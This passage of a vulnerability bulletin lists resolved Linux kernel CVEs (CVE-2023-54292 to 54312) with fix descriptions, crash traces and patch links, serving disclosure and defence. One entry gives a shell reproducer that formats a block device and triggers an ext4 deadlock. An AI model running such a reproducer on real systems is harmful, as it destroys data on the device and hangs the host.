irdma_exit_module+0x18/0x1e [irdma] [222808.419733] __do_sys_delete_module.constprop.0+0x1e2/0x310 [222808.419745] __x64_sys_delete_module+0x1b/0x30 [222808.419755] do_syscall_64+0x39/0x90 [222808.419763] entry_SYSCALL_64_after_hwframe+0x63/0xcd [222808.419829] value changed: 0x01 -> 0x03 | 2025-12-30 | not yet calculated | CVE-2023-54292 | https://git.kernel.org/stable/c/c5b5dbcbf91f769b8eb25f88e32a1522f920f37a https://git.kernel.org/stable/c/5986e96be7d0b82e50a9c6b019ea3f1926fd8764 https://git.kernel.org/stable/c/b8b90ba636e3861665aef9a3eab5fcf92839a2c5 https://git.kernel.org/stable/c/f0842bb3d38863777e3454da5653d80b5fde6321 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bcache: fixup btree_cache_wait list damage We get a kernel crash about "list_add corruption. next->prev should be prev (ffff9c801bc01210), but was ffff9c77b688237c. (next=ffffae586d8afe68)." crash> struct list_head 0xffff9c801bc01210 struct list_head { next = 0xffffae586d8afe68, prev = 0xffffae586d8afe68 } crash> struct list_head 0xffff9c77b688237c struct list_head { next = 0x0, prev = 0x0 } crash> struct list_head 0xffffae586d8afe68 struct list_head struct: invalid kernel virtual address: ffffae586d8afe68 type: "gdb_readmem_callback" Cannot access memory at address 0xffffae586d8afe68 [230469.019492] Call Trace: [230469.032041] prepare_to_wait+0x8a/0xb0 [230469.044363] ? bch_btree_keys_free+0x6c/0xc0 [escache] [230469.056533] mca_cannibalize_lock+0x72/0x90 [escache] [230469.068788] mca_alloc+0x2ae/0x450 [escache] [230469.080790] bch_btree_node_get+0x136/0x2d0 [escache] [230469.092681] bch_btree_check_thread+0x1e1/0x260 [escache] [230469.104382] ? finish_wait+0x80/0x80 [230469.115884] ? bch_btree_check_recurse+0x1a0/0x1a0 [escache] [230469.127259] kthread+0x112/0x130 [230469.138448] ? kthread_flush_work_fn+0x10/0x10 [230469.149477] ret_from_fork+0x35/0x40 bch_btree_check_thread() and bch_dirty_init_thread() may call mca_cannibalize() to cannibalize other cached btree nodes. Only one thread can do it at a time, so the op of other threads will be added to the btree_cache_wait list. We must call finish_wait() to remove op from btree_cache_wait before freeing its memory. Otherwise, the list will be damaged. We should also call bch_cannibalize_unlock() to release the btree_cache_alloc_lock and wake up other waiters. | 2025-12-30 | not yet calculated | CVE-2023-54293 | https://git.kernel.org/stable/c/bcb295778afda4f2feb0d3c0289a53fd43d5a3a6 https://git.kernel.org/stable/c/cbdd5b3322f7bbe6454c97cac994757f1192c07b https://git.kernel.org/stable/c/25ec4779d0fb3ed9cac1e4d9e0e4261b4a12f6ed https://git.kernel.org/stable/c/2882a4c4f0c90e99f37dbd8db369b9982fd613e7 https://git.kernel.org/stable/c/f0854489fc07d2456f7cc71a63f4faf9c716ffbe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid10: fix memleak of md thread In raid10_run(), if setup_conf() succeeds and raid10_run() fails before setting 'mddev->thread', then in the error path 'conf->thread' is not freed. Fix the problem by setting 'mddev->thread' right after setup_conf(). | 2025-12-30 | not yet calculated | CVE-2023-54294 | https://git.kernel.org/stable/c/abf4d67060c8f63caff096e5fca1564bfef1e5d4 https://git.kernel.org/stable/c/3725b35fc0e5e4eea0434ef625f3d92f3059d080 https://git.kernel.org/stable/c/2a65555f7e0f4a05b663879908a991e6d9f81e51 https://git.kernel.org/stable/c/d6cfcf98b824591cffa4c1e9889fb4fa619359fe https://git.kernel.org/stable/c/36ba0c7b86acd9c2ea80a273204d52c21c955471 https://git.kernel.org/stable/c/5d763f708b0f918fb87799e33c25113ae6081216 https://git.kernel.org/stable/c/ec473e82e10d39a02eb59b0b95e546119a3bdb79 https://git.kernel.org/stable/c/f0ddb83da3cbbf8a1f9087a642c448ff52ee9abd |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mtd: spi-nor: Fix shift-out-of-bounds in spi_nor_set_erase_type spi_nor_set_erase_type() was used either to set or to mask out an erase type. When we used it to mask out an erase type a shift-out-of-bounds was hit: UBSAN: shift-out-of-bounds in drivers/mtd/spi-nor/core.c:2237:24 shift exponent 4294967295 is too large for 32-bit type 'int' The setting of the size_{shift, mask} and of the opcode are unnecessary when the erase size is zero, as throughout the code just the erase size is considered to determine whether an erase type is supported or not. Setting the opcode to 0xFF was wrong too as nobody guarantees that 0xFF is an unused opcode. Thus when masking out an erase type, just set the erase size to zero. This will fix the shift-out-of-bounds. [ta: refine changes, new commit message, fix compilation error] | 2025-12-30 | not yet calculated | CVE-2023-54295 | https://git.kernel.org/stable/c/e6409208c13f7c56adc12dd795abf4141e3d5e64 https://git.kernel.org/stable/c/61d44a4db2f54dbac7d22c2541574ea5755e0468 https://git.kernel.org/stable/c/53b2916ebde741c657a857fa1936c0d9fcb59170 https://git.kernel.org/stable/c/99341b8aee7b5b4255b339345bbcaa35867dfd0c https://git.kernel.org/stable/c/f0f0cfdc3a024e21161714f2e05f0df3b84d42ad |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: SVM: Get source vCPUs from source VM for SEV-ES intrahost migration Fix a goof where KVM tries to grab source vCPUs from the destination VM when doing intrahost migration. Grabbing the wrong vCPU not only hoses the guest, it also crashes the host due to the VMSA pointer being left NULL. BUG: unable to handle page fault for address: ffffe38687000000 #PF: supervisor read access in kernel mode #PF: error_code(0x0000) - not-present page PGD 0 P4D 0 Oops: 0000 [#1] SMP NOPTI CPU: 39 PID: 17143 Comm: sev_migrate_tes Tainted: GO 6.5.0-smp--fff2e47e6c3b-next #151 Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.28.0 07/10/2023 RIP: 0010:__free_pages+0x15/0xd0 RSP: 0018:ffff923fcf6e3c78 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffffe38687000000 RCX: 0000000000000100 RDX: 0000000000000100 RSI: 0000000000000000 RDI: ffffe38687000000 RBP: ffff923fcf6e3c88 R08: ffff923fcafb0000 R09: 0000000000000000 R10: 0000000000000000 R11: ffffffff83619b90 R12: ffff923fa9540000 R13: 0000000000080007 R14: ffff923f6d35d000 R15: 0000000000000000 FS: 0000000000000000(0000) GS:ffff929d0d7c0000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: ffffe38687000000 CR3: 0000005224c34005 CR4: 0000000000770ee0 PKRU: 55555554 Call Trace: <TASK> sev_free_vcpu+0xcb/0x110 [kvm_amd] svm_vcpu_free+0x75/0xf0 [kvm_amd] kvm_arch_vcpu_destroy+0x36/0x140 [kvm] kvm_destroy_vcpus+0x67/0x100 [kvm] kvm_arch_destroy_vm+0x161/0x1d0 [kvm] kvm_put_kvm+0x276/0x560 [kvm] kvm_vm_release+0x25/0x30 [kvm] __fput+0x106/0x280 ____fput+0x12/0x20 task_work_run+0x86/0xb0 do_exit+0x2e3/0x9c0 do_group_exit+0xb1/0xc0 __x64_sys_exit_group+0x1b/0x20 do_syscall_64+0x41/0x90 entry_SYSCALL_64_after_hwframe+0x63/0xcd </TASK> CR2: ffffe38687000000 | 2025-12-30 | not yet calculated | CVE-2023-54296 | https://git.kernel.org/stable/c/5c18ace750e4d4d58d7da02d1c669bf21c824158 https://git.kernel.org/stable/c/2ee4b180d51b12a45bdd3264629719ef6a572a73 https://git.kernel.org/stable/c/f1187ef24eb8f36e8ad8106d22615ceddeea6097 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: btrfs: zoned: fix memory leak after finding block group with super blocks At exclude_super_stripes(), if we happen to find a block group that has super blocks mapped to it and we are on a zoned filesystem, we error out as this is not supposed to happen, indicating either a bug or maybe some memory corruption for example. However we are exiting the function without freeing the memory allocated for the logical address of the super blocks. Fix this by freeing the logical address. | 2025-12-30 | not yet calculated | CVE-2023-54297 | https://git.kernel.org/stable/c/ab80a901f8daca07c4a54af0ab0de745c9918294 https://git.kernel.org/stable/c/c35ea606196243063e63785918c7c8fe27c45798 https://git.kernel.org/stable/c/cca627afb463a4b47721eac017516ba200de85c3 https://git.kernel.org/stable/c/f1a07c2b4e2c473ec322b8b9ece071b8c88a3512 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: thermal: intel: quark_dts: fix error pointer dereference If alloc_soc_dts() fails, then we can just return. Trying to free "soc_dts" will lead to an Oops. | 2025-12-30 | not yet calculated | CVE-2023-54298 | https://git.kernel.org/stable/c/0b366c6a42e2e2bc67af8d1130b68f3bfa31c80e https://git.kernel.org/stable/c/d0178f2788fb1183a5cc350213efdc94010b9147 https://git.kernel.org/stable/c/e23f1d9e6e03d04da2f18e78ab5d4255ffeb1333 https://git.kernel.org/stable/c/f73134231fa23e0856c15010db5f5c03693c1e92 https://git.kernel.org/stable/c/5eaf55b38691291d49417c22e726591078ca1893 https://git.kernel.org/stable/c/69e49f1b53605706bc2203455021539aba2ebe21 https://git.kernel.org/stable/c/24c221b11c2894e1a5f07b93362d9bc91c6d8be7 https://git.kernel.org/stable/c/f1b930e740811d416de4d2074da48b6633a672c8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: usb: typec: bus: verify partner exists in typec_altmode_attention Some usb hubs will negotiate DisplayPort Alt mode with the device but will then negotiate a data role swap after entering the alt mode. The data role swap causes the device to unregister all alt modes, however the usb hub will still send Attention messages even after failing to reregister the Alt Mode. typec_altmode_attention currently does not verify whether or not a device's altmode partner exists, which results in a NULL pointer error when dereferencing the typec_altmode and typec_altmode_ops belonging to the altmode partner. Verify the presence of a device's altmode partner before sending the Attention message to the Alt Mode driver. | 2025-12-30 | not yet calculated | CVE-2023-54299 | https://git.kernel.org/stable/c/5f71716772b88cbe0e1788f6a38d7871aff2120b https://git.kernel.org/stable/c/38e1f2ee82bacbbfded8f1c06794a443d038d054 https://git.kernel.org/stable/c/0ad6bad31da692f8d7acacab07eabe7586239ae0 https://git.kernel.org/stable/c/0d3b5fe47938e9c451466845304a2bd74e967a80 https://git.kernel.org/stable/c/d49547950bf7f3480d6ca05fe055978e5f0d9e5b https://git.kernel.org/stable/c/1101867a1711c27d8bbe0e83136bec47f8c1ca2a https://git.kernel.org/stable/c/f23643306430f86e2f413ee2b986e0773e79da31 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath9k: avoid referencing uninit memory in ath9k_wmi_ctrl_rx For the reasons also described in commit b383e8abed41 ("wifi: ath9k: avoid uninit memory read in ath9k_htc_rx_msg()"), ath9k_htc_rx_msg() should validate pkt_len before accessing the SKB. For example, the obtained SKB may have been badly constructed with pkt_len = 8. In this case, the SKB can only contain a valid htc_frame_hdr, but after being processed in ath9k_htc_rx_msg() and passed to the ath9k_wmi_ctrl_rx() endpoint RX handler, it is expected to have a WMI command header which should be located inside its data payload. Implement sanity checking inside ath9k_wmi_ctrl_rx(). Otherwise, uninit memory can be referenced. Tested on Qualcomm Atheros Communications AR9271 802.11n. Found by Linux Verification Center (linuxtesting.org) with Syzkaller. | 2025-12-30 | not yet calculated | CVE-2023-54300 | https://git.kernel.org/stable/c/0bc12e41af4e3ae1f0efecc377f0514459df0707 https://git.kernel.org/stable/c/28259ce4f1f1f9ab37fa817756c89098213d2fc0 https://git.kernel.org/stable/c/90e3c10177573b8662ac9858abd9bf731d5d98e0 https://git.kernel.org/stable/c/250efb4d3f5b32a115ea6bf25437ba44a1b3c04f https://git.kernel.org/stable/c/ad5425e70789c29b93acafb5bb4629e4eb908296 https://git.kernel.org/stable/c/d1c2ff2bd84c3692c9df267a2b991ce92bfca8ef https://git.kernel.org/stable/c/8ed572e52714593b209e3aa352406aff84481179 https://git.kernel.org/stable/c/75acec91aeaa07375cd5f418069e61b16d39bbad https://git.kernel.org/stable/c/f24292e827088bba8de7158501ac25a59b064953 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: serial: 8250_bcm7271: fix leak in `brcmuart_probe` Smatch reports: drivers/tty/serial/8250/8250_bcm7271.c:1120 brcmuart_probe() warn: 'baud_mux_clk' from clk_prepare_enable() not released on lines: 1032. The issue is fixed by using a managed clock. | 2025-12-30 | not yet calculated | CVE-2023-54301 | https://git.kernel.org/stable/c/5258395e67fee6929fb8e50c8239f8de51b8cb2d https://git.kernel.org/stable/c/2a3e5f428fc4315be6144524912eaefac16f43a9 https://git.kernel.org/stable/c/56a81445b8e4b8906d557518c5dae3ddbb447d1e https://git.kernel.org/stable/c/f264f2f6f4788dc031cef60a0cf2881902736709 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: Fix data race on CQP completion stats CQP completion statistics are read locklessly in irdma_wait_event and irdma_check_cqp_progress while they can be updated in the completion thread irdma_sc_ccq_get_cqe_info on another CPU, as KCSAN reports. Make completion statistics an atomic variable to reflect coherent updates to it. This will also avoid the load/store tearing logic bug potentially possible by compiler optimizations. [77346.170861] BUG: KCSAN: data-race in irdma_handle_cqp_op [irdma] / irdma_sc_ccq_get_cqe_info [irdma] [77346.171383] write to 0xffff8a3250b108e0 of 8 bytes by task 9544 on cpu 4: [77346.171483] irdma_sc_ccq_get_cqe_info+0x27a/0x370 [irdma] [77346.171658] irdma_cqp_ce_handler+0x164/0x270 [irdma] [77346.171835] cqp_compl_worker+0x1b/0x20 [irdma] [77346.172009] process_one_work+0x4d1/0xa40 [77346.172024] worker_thread+0x319/0x700 [77346.172037] kthread+0x180/0x1b0 [77346.172054] ret_from_fork+0x22/0x30 [77346.172136] read to 0xffff8a3250b108e0 of 8 bytes by task 9838 on cpu 2: [77346.172234] irdma_handle_cqp_op+0xf4/0x4b0 [irdma] [77346.172413] irdma_cqp_aeq_cmd+0x75/0xa0 [irdma] [77346.172592] irdma_create_aeq+0x390/0x45a [irdma] [77346.172769] irdma_rt_init_hw.cold+0x212/0x85d [irdma] [77346.172944] irdma_probe+0x54f/0x620 [irdma] [77346.173122] auxiliary_bus_probe+0x66/0xa0 [77346.173137] really_probe+0x140/0x540 [77346.173154] __driver_probe_device+0xc7/0x220 [77346.173173] driver_probe_device+0x5f/0x140 [77346.173190] __driver_attach+0xf0/0x2c0 [77346.173208] bus_for_each_dev+0xa8/0xf0 [77346.173225] driver_attach+0x29/0x30 [77346.173240] bus_add_driver+0x29c/0x2f0 [77346.173255] driver_register+0x10f/0x1a0 [77346.173272] __auxiliary_driver_register+0xbc/0x140 [77346.173287] irdma_init_module+0x55/0x1000 [irdma] [77346.173460] do_one_initcall+0x7d/0x410 [77346.173475] do_init_module+0x81/0x2c0 [77346.173491] load_module+0x1232/0x12c0 [77346.173506] __do_sys_finit_module+0x101/0x180 [77346.173522] __x64_sys_finit_module+0x3c/0x50 [77346.173538] do_syscall_64+0x39/0x90 [77346.173553] entry_SYSCALL_64_after_hwframe+0x63/0xcd [77346.173634] value changed: 0x0000000000000094 -> 0x0000000000000095 | 2025-12-30 | not yet calculated | CVE-2023-54302 | https://git.kernel.org/stable/c/bf0f9f65b7fe36ea9d2e23263dcefc90255d7b1f https://git.kernel.org/stable/c/4e1a5842a359ee18d5a9e75097d7cf4d93e233bb https://git.kernel.org/stable/c/2623ca92cd8f9668edabe9e4f4a3cf77fd7115f2 https://git.kernel.org/stable/c/f2c3037811381f9149243828c7eb9a1631df9f9c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: bpf: Disable preemption in bpf_perf_event_output The nesting protection in bpf_perf_event_output relies on disabled preemption, which is guaranteed for kprobes and tracepoints. However, bpf_perf_event_output can also be called from uprobes context through the bpf_prog_run_array_sleepable function, which disables migration but keeps preemption enabled. This can cause a task to be preempted by another one inside the nesting protection and eventually lead to two tasks using the same perf_sample_data buffer, causing crashes like: kernel tried to execute NX-protected page - exploit attempt? (uid: 0) BUG: unable to handle page fault for address: ffffffff82be3eea ... Call Trace: ? __die+0x1f/0x70 ? page_fault_oops+0x176/0x4d0 ? exc_page_fault+0x132/0x230 ? asm_exc_page_fault+0x22/0x30 ? perf_output_sample+0x12b/0x910 ? perf_event_output+0xd0/0x1d0 ? bpf_perf_event_output+0x162/0x1d0 ? bpf_prog_c6271286d9a4c938_krava1+0x76/0x87 ? __uprobe_perf_func+0x12b/0x540 ? uprobe_dispatcher+0x2c4/0x430 ? uprobe_notify_resume+0x2da/0xce0 ? atomic_notifier_call_chain+0x7b/0x110 ? exit_to_user_mode_prepare+0x13e/0x290 ? irqentry_exit_to_user_mode+0x5/0x30 ? asm_exc_int3+0x35/0x40 Fix this by disabling preemption in bpf_perf_event_output. | 2025-12-30 | not yet calculated | CVE-2023-54303 | https://git.kernel.org/stable/c/3654ed5daf492463c3faa434c7000d45c2da2ace https://git.kernel.org/stable/c/a0ac32cf61e5a76e2429e486925a52ee41dd75e3 https://git.kernel.org/stable/c/f2c67a3e60d1071b65848efaa8c3b66c363dd025 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: firmware: meson_sm: fix to avoid potential NULL pointer dereference of_match_device() may fail and return a NULL pointer. Fix this by checking the return value of of_match_device. | 2025-12-30 | not yet calculated | CVE-2023-54304 | https://git.kernel.org/stable/c/fba9c24c196310546f13c77ff66d0741155fa771 https://git.kernel.org/stable/c/9f4017cac70c04090dd4f672e755d6c875af67d8 https://git.kernel.org/stable/c/502dfc5875bab9ae5d6a2939146c2c5e5683be40 https://git.kernel.org/stable/c/bd3a6b6d5dd863dbbe17985c7612159cf4533cad https://git.kernel.org/stable/c/68f3209546b5083f8bffa46f7173cc05191eace1 https://git.kernel.org/stable/c/2d6c4a1a4e6678cb98dd57964f133a995ecc91c1 https://git.kernel.org/stable/c/f2ed165619c16577c02b703a114a1f6b52026df4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: refuse to create ea block when umounted The ea block expansion needs to access s_root while it is already set to NULL when umount is triggered. Refuse this request to avoid a panic. | 2025-12-30 | not yet calculated | CVE-2023-54305 | https://git.kernel.org/stable/c/aedea161d031502a423ed1c7597754681a4f8cda https://git.kernel.org/stable/c/21f6a80d9234422e2eb445734b22c78fc5bf6719 https://git.kernel.org/stable/c/a92b67e768bde433b9385cde56c09deb58db269e https://git.kernel.org/stable/c/0dc0fa313bb4e86382a3e7125429710d44383196 https://git.kernel.org/stable/c/116008ada3d0de4991099edaf6b8c2e9cd6f225a https://git.kernel.org/stable/c/05cbf6ddd9847c7b4f0662c048f195b09405a9d0 https://git.kernel.org/stable/c/a458a8c1d1fc4e10a1813786132b09a3863ad3f2 https://git.kernel.org/stable/c/f31173c19901a96bb2ebf6bcfec8a08df7095c91 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: tls: avoid hanging tasks on the tx_lock syzbot sent a hung task report and Eric explains that an adversarial receiver may keep RWIN at 0 for a long time, so we are not guaranteed to make forward progress. A thread which took tx_lock and went to sleep may not release tx_lock for hours. Use interruptible sleep where possible and reschedule the work if it can't take the lock. Testing: existing selftest passes | 2025-12-30 | not yet calculated | CVE-2023-54306 | https://git.kernel.org/stable/c/bde541a57b4204d0a800afbbd3d1c06c9cdb133f https://git.kernel.org/stable/c/7123a4337bf73132bbfb5437e4dc83ba864a9a1e https://git.kernel.org/stable/c/be5d5d0637fd88c18ee76024bdb22649a1de00d6 https://git.kernel.org/stable/c/1f800f6aae57d2d8f63d32fff383017cbc11cf65 https://git.kernel.org/stable/c/ccf1ccdc5926907befbe880b562b2a4b5f44c087 https://git.kernel.org/stable/c/f3221361dc85d4de22586ce8441ec2c67b454f5d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ptp_qoriq: fix memory leak in probe() Smatch complains that: drivers/ptp/ptp_qoriq.c ptp_qoriq_probe() warn: 'base' from ioremap() not released. Fix this by revising the parameter from 'ptp_qoriq->base' to 'base'. This is only a bug if ptp_qoriq_init() returns on the first -ENODEV error path. For other error paths ptp_qoriq->base and base are the same. And this change makes the code more readable. | 2025-12-30 | not yet calculated | CVE-2023-54307 | https://git.kernel.org/stable/c/46c4993a1514eea3bbc7147d0c81c23cc06c6bed https://git.kernel.org/stable/c/3907fcb5a439933cf8c10d6dc300bc11eba30de3 https://git.kernel.org/stable/c/c0de1a26e6595b0e7969c5b35990a77a2d93104f https://git.kernel.org/stable/c/43b4331ce0cd88ccba425e0702ba35c1a52daccf https://git.kernel.org/stable/c/c960785c8168d0e572101ed921b9be3934ed0bc9 https://git.kernel.org/stable/c/f33642224e38d7e0d59336e10e7b4e370b1c4506 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ALSA: ymfpci: Create card with device-managed snd_devm_card_new() snd_card_ymfpci_remove() was removed in commit c6e6bb5eab74 ("ALSA: ymfpci: Allocate resources with device-managed APIs"), but the call to snd_card_new() was not replaced with snd_devm_card_new(). Since there was no longer a call to snd_card_free, unloading the module would eventually result in Oops: [697561.532887] BUG: unable to handle page fault for address: ffffffffc0924480 [697561.532893] #PF: supervisor read access in kernel mode [697561.532896] #PF: error_code(0x0000) - not-present page [697561.532899] PGD ae1e15067 P4D ae1e15067 PUD ae1e17067 PMD 11a8f5067 PTE 0 [697561.532905] Oops: 0000 [#1] PREEMPT SMP NOPTI [697561.532909] CPU: 21 PID: 5080 Comm: wireplumber Tainted: G W OE 6.2.7 #1 [697561.532914] Hardware name: System manufacturer System Product Name/TUF GAMING X570-PLUS, BIOS 4408 10/28/2022 [697561.532916] RIP: 0010:try_module_get.part.0+0x1a/0xe0 [697561.532924] Code: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 0f 1f 44 00 00 55 48 89 e5 41 55 41 54 49 89 fc bf 01 00 00 00 e8 56 3c f8 ff <41> 83 3c 24 02 0f 84 96 00 00 00 41 8b 84 24 30 03 00 00 85 c0 0f [697561.532927] RSP: 0018:ffffbe9b858c3bd8 EFLAGS: 00010246 [697561.532930] RAX: ffff9815d14f1900 RBX: ffff9815c14e6000 RCX: 0000000000000000 [697561.532933] RDX: 0000000000000000 RSI: ffffffffc055092c RDI: ffffffffb3778c1a [697561.532935] RBP: ffffbe9b858c3be8 R08: 0000000000000040 R09: ffff981a1a741380 [697561.532937] R10: ffffbe9b858c3c80 R11: 00000009d56533a6 R12: ffffffffc0924480 [697561.532939] R13: ffff9823439d8500 R14: 0000000000000025 R15: ffff9815cd109f80 [697561.532942] FS: 00007f13084f1f80(0000) GS:ffff9824aef40000(0000) knlGS:0000000000000000 [697561.532945] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [697561.532947] CR2: ffffffffc0924480 CR3: 0000000145344000 CR4: 0000000000350ee0 [697561.532949] Call Trace: [697561.532951] <TASK> [697561.532955] try_module_get+0x13/0x30 [697561.532960] snd_ctl_open+0x61/0x1c0 [snd] [697561.532976] snd_open+0xb4/0x1e0 [snd] [697561.532989] chrdev_open+0xc7/0x240 [697561.532995] ? fsnotify_perm.part.0+0x6e/0x160 [697561.533000] ? __pfx_chrdev_open+0x10/0x10 [697561.533005] do_dentry_open+0x169/0x440 [697561.533009] vfs_open+0x2d/0x40 [697561.533012] path_openat+0xa9d/0x10d0 [697561.533017] ? debug_smp_processor_id+0x17/0x20 [697561.533022] ? trigger_load_balance+0x65/0x370 [697561.533026] do_filp_open+0xb2/0x160 [697561.533032] ? _raw_spin_unlock+0x19/0x40 [697561.533036] ? alloc_fd+0xa9/0x190 [697561.533040] do_sys_openat2+0x9f/0x160 [697561.533044] __x64_sys_openat+0x55/0x90 [697561.533048] do_syscall_64+0x3b/0x90 [697561.533052] entry_SYSCALL_64_after_hwframe+0x72/0xdc [697561.533056] RIP: 0033:0x7f1308a40db4 [697561.533059] Code: 24 20 eb 8f 66 90 44 89 54 24 0c e8 46 68 f8 ff 44 8b 54 24 0c 44 89 e2 48 89 ee 41 89 c0 bf 9c ff ff ff b8 01 01 00 00 0f 05 <48> 3d 00 f0 ff ff 77 32 44 89 c7 89 44 24 0c e8 78 68 f8 ff 8b 44 [697561.533062] RSP: 002b:00007ffcce664450 EFLAGS: 00000293 ORIG_RAX: 0000000000000101 [697561.533066] RAX: ffffffffffffffda RBX: 0000000000000003 RCX: 00007f1308a40db4 [697561.533068] RDX: 0000000000080000 RSI: 00007ffcce664690 RDI: 00000000ffffff9c [697561.533070] RBP: 00007ffcce664690 R08: 0000000000000000 R09: 0000000000000012 [697561.533072] R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000080000 [697561.533074] R13: 00007f13054b069b R14: 0000565209f83200 R15: 0000000000000000 [697561.533078] </TASK> | 2025-12-30 | not yet calculated | CVE-2023-54308 | https://git.kernel.org/stable/c/95642872c466030240199ba796a40771c493ed0c https://git.kernel.org/stable/c/db7d7782677ff998c06997903d5400a0ba91cebb https://git.kernel.org/stable/c/255a81a89501df77379b51a81c7a2e8e7c359bc6 https://git.kernel.org/stable/c/f33fc1576757741479452255132d6e3aaf558ffe |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tpm: tpm_vtpm_proxy: fix a race condition in /dev/vtpmx creation /dev/vtpmx is made visible before 'workqueue' is initialized, which can lead to a memory corruption in the worst case scenario. Address this by initializing 'workqueue' as the very first step of the driver initialization. | 2025-12-30 | not yet calculated | CVE-2023-54309 | https://git.kernel.org/stable/c/509d21f1c4bb9d35d397fca3226165b156a7639f https://git.kernel.org/stable/c/04e8697d26613ccea760cf57eb20a5a27f788c0f https://git.kernel.org/stable/c/86b9820395f226b8f33cbae9599deebf8af1ce72 https://git.kernel.org/stable/c/9ff7fcb3a2ed0e9b895bb5b4c13872d584a8815b https://git.kernel.org/stable/c/e08295290c53a3cf174c236721747a01b9550ae2 https://git.kernel.org/stable/c/99b998fb9d7d2d2d9dbb3e19db2d0ade02f5a604 https://git.kernel.org/stable/c/092db954e2c3c5ba6c0ce990c7da72cf8f3b9c51 https://git.kernel.org/stable/c/f4032d615f90970d6c3ac1d9c0bce3351eb4445c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: scsi: message: mptlan: Fix use after free bug in mptlan_remove() due to race condition mptlan_probe() calls mpt_register_lan_device() which initializes the &priv->post_buckets_task workqueue. A call to mpt_lan_wake_post_buckets_task() will subsequently start the work. During driver unload in mptlan_remove() the following race may occur: CPU0 runs mptlan_remove() -> free_netdev() -> kfree(dev); while CPU1 runs mpt_lan_post_receive_buckets_work() -> dev->mtu (use after free). Fix this by finishing the work prior to cleaning up in mptlan_remove(). [mkp: we really should remove mptlan instead of attempting to fix it] | 2025-12-30 | not yet calculated | CVE-2023-54310 | https://git.kernel.org/stable/c/92f869693d84e813895ff4d25363744575515423 https://git.kernel.org/stable/c/60c8645ad6f5b722615383d595d63b62b07a13c3 https://git.kernel.org/stable/c/410e610a96c52a7b41e2ab6c9ca60868d9acecce https://git.kernel.org/stable/c/697f92f8317e538d8409a0c95d6370eb40b34c05 https://git.kernel.org/stable/c/e84282efc87f2414839f6e15c31b4daa34ebaac1 https://git.kernel.org/stable/c/9c6da3b7f12528cd52c458b33496a098b838fcfc https://git.kernel.org/stable/c/48daa4a3015d859ee424948844ce3c12f2fe44e6 https://git.kernel.org/stable/c/f486893288f3e9b171b836f43853a6426515d800 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ext4: fix deadlock when converting an inline directory in nojournal mode In no journal mode, ext4_finish_convert_inline_dir() can self-deadlock by calling ext4_handle_dirty_dirblock() when it has already taken the directory lock. There is a similar self-deadlock in ext4_convert_inline_data_nolock() for data files which we'll fix at the same time. A simple reproducer demonstrating the problem: mke2fs -Fq -t ext2 -O inline_data -b 4k /dev/vdc 64 mount -t ext4 -o dirsync /dev/vdc /vdc cd /vdc mkdir file0 cd file0 touch file0 touch file1 attr -s BurnSpaceInEA -V abcde . touch supercalifragilisticexpialidocious | 2025-12-30 | not yet calculated | CVE-2023-54311 | https://git.kernel.org/stable/c/b4fa4768c9acff77245d672d855d2c88294850b1 https://git.kernel.org/stable/c/5f8b55136ad787aed2c184f7cb3e93772ae637a3 https://git.kernel.org/stable/c/640c8c365999c6f23447ac766437236ad88317c5 https://git.kernel.org/stable/c/665cc3ba50330049524c1d275bc840a8f28dde73 https://git.kernel.org/stable/c/0b1c4357bb21d9770451a1bdb8d419ea10bada88 https://git.kernel.org/stable/c/804de0c72cd473e186ca4e1f6287d45431b14e5a https://git.kernel.org/stable/c/f4ce24f54d9cca4f09a395f3eecce20d6bec4663 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: samples/bpf: Fix buffer overflow in tcp_basertt Using sizeof(nv) or strlen(nv)+1 is correct. | 2025-12-30 | not yet calculated | CVE-2023-54312 | https://git.kernel.org/stable/c/cf7514fedc25675e68b74941df28a883951e70fd https://git.kernel.org/stable/c/f394d204d64095d72ad9f03ff98f3f3743bf743a https://git.kernel.org/stable/c/bd3e880dce27d225598730d2bbb3dc05b443af22 https://git.kernel.org/stable/c/e92f61e0701ea780e57e1be8dbd1fbec5f42c09e https://git.kernel.org/stable/c/56c25f2763a16db4fa1b486e6a21dc246cd992bd https://git.kernel.org/stable/c/dfc004688518d24159606289c74d0c4e123e6436 https://git.kernel.org/stable/c/7c08d1b0d1f75117cf82aeaef49ba9f861b3fb59 https://git.kernel.org/stable/c/f4dea9689c5fea3d07170c2cb0703e216f1a0922 |
